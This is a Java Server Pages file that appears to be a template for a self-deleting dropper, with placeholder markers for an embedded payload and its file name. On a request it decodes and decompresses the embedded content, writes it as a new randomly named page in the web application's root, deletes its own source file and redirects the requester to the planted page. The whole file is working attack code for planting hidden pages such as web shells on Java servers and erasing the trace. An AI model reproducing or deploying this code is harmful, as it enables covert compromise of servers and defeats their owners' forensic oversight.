<%@ page language="java" session="true" isThreadSafe="true" contentType="text/plain" %>
<%@ page import="java.io.ByteArrayInputStream" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.File" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.io.FileOutputStream" %>
<%@ page import="java.util.zip.GZIPInputStream" %>
<%@ page import="sun.misc.BASE64Decoder" %>

<%!
	private static final String JSP_CONTENT="@@JSP_CONTENT@@";

	private static final String JSP_PREFIX="@@JSP_NAME_PREFIX@@";
	private static final String JSP_SUFFIX="@@JSP_NAME_SUFFIX@@";
	private static final int BUF_SIZE = 4096;
	private static String copiedPath = null;	// also serves as flag that we've copied the data out

	/**
	 * Copy in to out. Does not close streams.
	 * @param in Strea mto read from.
	 * @param out stream to write to.
	 * @throws IOException if reading or writing does.
	 */
	private static void copy(InputStream in, OutputStream out) throws IOException
	{
		byte[] buf = new byte[BUF_SIZE];
		int amount_read;

		while((amount_read = in.read(buf))>=0)
			out.write(buf,0,amount_read);
	}

	/**
	 * Decode base64 encoded data. Currently this calls
	 * sun.misc.BASE64Decoder.
	 * @param str The string to decode
	 * @return the decoded byte array.
	 */
	private static byte[] debase64(String str) throws IOException
	{
		return new BASE64Decoder().decodeBuffer(str);
	}

	/**
	 * Decode, decompress and write data to a file.
	 * @param base64 The string to decode, decompress and write
	 * @param file The file to write the data to.
	 * @throws IOException If decoding, decompressing or writing does.
	 */
	private static void b64GzippedToFile(String base64, File file) throws IOException
	{
		byte[] bytes;
		GZIPInputStream gzIn;
		FileOutputStream fout;
		
		bytes = debase64(base64);
		gzIn = new GZIPInputStream(new ByteArrayInputStream(bytes));
		fout = new FileOutputStream(file);
		try
		{
			copy(gzIn,fout);
		}
		catch(IOException e)
		{
			try
			{
				fout.close();
			}
			catch(IOException ignored)
			{
			}
			throw e;
		}
		fout.close();
	}

	/**
	 * Copies the new jsp content to a file. The file is located in
	 * the context root of the applicaton.
	 * @returns Servlet path to new jsp.
	 */
	private String copyOut(HttpServletRequest request, ServletContext ctx) throws IOException
	{
		File ctxRoot;
		File newJsp;

		synchronized(this.getClass())
		{
			if(copiedPath == null)
			{
				ctxRoot = new File(ctx.getRealPath("/"));
				newJsp = File.createTempFile(JSP_PREFIX, JSP_SUFFIX, ctxRoot);
				b64GzippedToFile(JSP_CONTENT, newJsp);
				copiedPath = request.getContextPath() + '/' + newJsp.getName();
			}
			return copiedPath;
		}
	}

	/**
	 * Remove this JSP's source file.
	 */
	private void removeSelf(HttpServletRequest request, ServletContext ctx) throws IOException
	{
		String servletPath = request.getServletPath();
		String jspPath = ctx.getRealPath(servletPath);
		if(jspPath != null)
		{
			File jspFile = new File(jspPath);
	
			if(jspFile.exists())
			{
				if(!jspFile.delete())
				{
					jspFile.deleteOnExit();
				}
			}
		}
	}

%>
<%
	String path = copyOut(request, application);
	removeSelf(request, application);
	response.sendRedirect(path);
%>
@@JSP_OUTPUT@@
